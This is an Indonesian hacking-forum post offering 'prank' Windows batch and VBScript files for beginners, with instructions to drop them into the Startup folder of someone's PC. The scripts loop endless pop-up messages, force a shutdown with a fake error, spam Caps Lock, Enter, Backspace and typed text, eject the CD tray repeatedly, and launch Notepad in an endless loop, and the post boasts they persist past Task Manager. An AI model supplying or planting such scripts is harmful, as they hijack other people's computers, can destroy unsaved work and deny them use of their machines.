GPL - Cyber Team
Welcome To Indonesian GPL - Team Community
ini adalah forum untuk saling berbagi ilmu tentang dunia IT
silahkan daftar dan bergabung bersama kami.
jangan takut tersaingi karena kita telah berbagi, menjadi seseorang yang berada tertinggi sendiri itu tidak mengenakan, berbagi itu indah
regard`s GPL - Team
GPL - Cyber Team
Welcome To Indonesian GPL - Team Community
ini adalah forum untuk saling berbagi ilmu tentang dunia IT
silahkan daftar dan bergabung bersama kami.
jangan takut tersaingi karena kita telah berbagi, menjadi seseorang yang berada tertinggi sendiri itu tidak mengenakan, berbagi itu indah
regard`s GPL - Team
GPL - Cyber Team
Would you like to react to this message? Create an account in a few clicks or log in to continue.

GPL - Cyber Team

Kita Senang Berbagi
 
IndeksGalleryLatest imagesPencarianPendaftaranLogin
Welcome To Indonesian GPL - Team Community
Statistics
Total 372 user terdaftar
User terdaftar terakhir adalah nurfatriani

Total 135 kiriman artikel dari user in 84 subjects

 

 scrip kocak and bikin kesel tapi bkin asik

Go down 
PengirimMessage
andysoekamti
Staf GPL
Staf GPL
andysoekamti


Jumlah posting : 103
Points : 258
Join date : 27.06.10
Age : 30
Lokasi : Bekasi

scrip kocak and bikin kesel tapi bkin asik Empty
PostSubyek: scrip kocak and bikin kesel tapi bkin asik   scrip kocak and bikin kesel tapi bkin asik EmptySun Jul 04, 2010 11:36 am

Yang masuk ksni ketaun orang2 usil smua nich.. langsung k TKP..

- Open notepad lalu seperti biasa tinggal 'copas' script d bawah
- File jadi'y cukup d taro d startUp nanti'y...

Bikin message yang nongol terus-terusan...

@ECHO off
:Begin
msg * -WARNING-
msg * Sorry PC lo kaya'y ngaco....
msg * Udah install ulang aja.....
msg * Biar masalah nya kelar....
msg * Wkwkwkwkwkkkkkkkk....
GOTO BEGIN

save namafile ( .BAT )

- Kejadian yg udah2 biar katA d kill d task manager, masih tetep ja nongol ntu message

Bikin Shutdown trus da Message'y...

@ECHO off
msg * -=WARNING=-
shutdown -s -c "Error !!!"

save namafile ( .BAT )

Maenin Caps Lock...

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

save namafile ( .vbs )

Maenin CD/DVD biar buka tutup mulu...

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

save namafile ( .vbs )

Bikin vbscript nongol mlulu...

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

save namafile ( .vbs )

- Kejadian yg udah2 d task manager jd full wscript yg lg running

Bikin tombol Backspace neken mlulu...

MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

save namafile ( .vbs )

Bikin otomatis ngetik "Erorr!!!" di notepad/word...

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Erorr!!!"
loop

save namafile ( .vbs )

Bikin supaya buka notepad mlulu...

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

save namafile ( .BAT )

- Ati2 cz ni script klo mnurut ane pling ngeselin bgt....
- Klo mw yg kluar bkn notepad tinggal rubah ja DIR'y....

Bikin supaya setiap buka notepad otomatis ngetik apa yg ente mau...

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "E"
WScript.Sleep 50
WshShell.SendKeys "R"
WScript.Sleep 50
WshShell.SendKeys "O"
WScript.Sleep 50
WshShell.SendKeys "R "
WScript.Sleep 50
WshShell.SendKeys "R "
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!"

save namafile ( .vbs )


Mohon maaf sebelum'y kLo script ini dah BASI.... Ni cuma buat ngingetin ane yg pelupa.... :119:
Kembali Ke Atas Go down
http://heckeria.net
 
scrip kocak and bikin kesel tapi bkin asik
Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
GPL - Cyber Team :: Hacking Forum :: Hacking Area :: Hacking Pemula-
Navigasi: